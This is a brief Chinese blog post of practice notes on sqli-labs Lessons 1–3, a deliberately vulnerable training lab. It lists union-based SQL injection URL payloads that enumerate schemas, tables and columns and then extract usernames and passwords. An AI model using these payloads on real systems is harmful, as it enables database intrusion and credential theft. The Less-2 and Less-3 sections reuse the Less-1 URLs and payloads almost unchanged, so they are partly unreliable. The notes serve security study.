sql-labs注入1到3

最新推荐文章于 2022-12-29 21:26:05 发布

榴莲豆腐脑_

最新推荐文章于 2022-12-29 21:26:05 发布

阅读量84

点赞数 1

分类专栏： sql

本文链接：https://blog.csdn.net/weixin_50998641/article/details/119273999

版权

SQL注入数据库探测信息泄露安全防护 Web安全

关键词由CSDN通过智能技术生成

sql 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

sql注入练习

Less-1

1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入（字符型注入）
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询security中users内的列名
select group_concat(password) from security.users
select group_concat(username) from security.users
获得用户名，密码

Less-2

1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入（报错，存在注入点）（数值型注入）
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询列名
select group_concat(password) from security.users
select group_concat(username) from security.users
得到用户名，密码

Less-3

1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入（报错，存在注入点）
?id=1 and 1=2 未报错，不是数值型
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询列名
select group_concat(password) from security.users
select group_concat(username) from security.users
获得用户名，密码

榴莲豆腐脑_

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sql-labs注入1到3

sql注入练习Less-11.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入（字符型注入）2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select gr
复制链接

扫一扫

专栏目录